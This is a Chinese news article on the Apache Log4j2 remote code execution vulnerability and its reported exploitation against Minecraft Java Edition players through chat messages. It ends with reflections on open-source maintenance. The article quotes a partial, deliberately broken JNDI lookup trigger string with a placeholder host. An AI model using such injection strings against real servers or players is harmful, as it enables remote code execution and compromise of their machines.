
文章图片

文章图片
12月9日晚 , 根据360安全卫士服务号披露 , 开源项目Apache Log4j2存在的一个远程代码执行漏洞 , 其中细节被公开 , 很多黑客伺机开始攻击各种商业项目 。
log4j由于log4j 是java生态中非常非常基础的一个日志库 , 可以说是到“水电煤”级别的库 。 JAVA的很多组件都会依赖、使用这个库进行日志写入 。
【apache|元宇宙概念游戏“我的世界”遭到由漏洞引起的网络攻击】目前 Apache Solr、Apache Struts2、Apache Druid、Apache Flink 等众多组件及大型应用均已经受到了影响 , 需尽快采取方案阻止 。
我的世界JAVA版攻击特别是我的世界JAVA版本中 , 攻击方法超级简单 , 在游戏的在线聊天中 , 发送一条带漏洞触发指令的消息 , 类似“$(其实这里没有文字 , 但是不加连这文章都会报错){jndi:ldap://{.http://xxxxxxxxxxxxxx”就可以对收到这条消息的用户发起攻击 。
截止目前 , 根据360观测到的数据 , “我的世界”数十万用户被入侵 。 因触发简单、攻击难度低、而首当其冲 。
老斜说log4j这个库不是大企业开发的 , 而且是免费开源 , 它后续的维护和升级都是一群为爱发电的开发者在那里维护升级的 。
所以讲真的 , 这群开发者也没有法律义务去修复好这个漏洞 。 这事也给普通开发者敲一下警钟 , 免费开源是很香 , 但是一定要做好隔离和熔断 。 不然后果不堪设想 。
- 36氪首发|烹饪机器人公司「智谷天厨」获数千万元天使轮融资,羲融善道独家投资
- ZOL科技早餐:华为千元手表官宣,腾讯QQ回应大规模盗号
- 高地|上海:瞄准千亿元规模布局氢能产业
- 苹果|美科技巨头每秒能赚多少钱?苹果11376元
- ssd|小屏旗舰跌至2699元,67W快充+5000万三摄,成荣耀70最大对手
- 图像传感器|到手1849元重量189g这才是高性价比的骁龙870直屏手机
- 微信阅读口袋电子书599元
- 土星环比恐龙还要年轻?这些宇宙冷知识很少有人知道
- 汽油|今日24时开启!油价或迎年内第2降 重回9元时代:加一箱将少花12.5元
- 华为|重磅级新品官宣:华为全屋智能2.0将于7月4日发布 前代39999元起
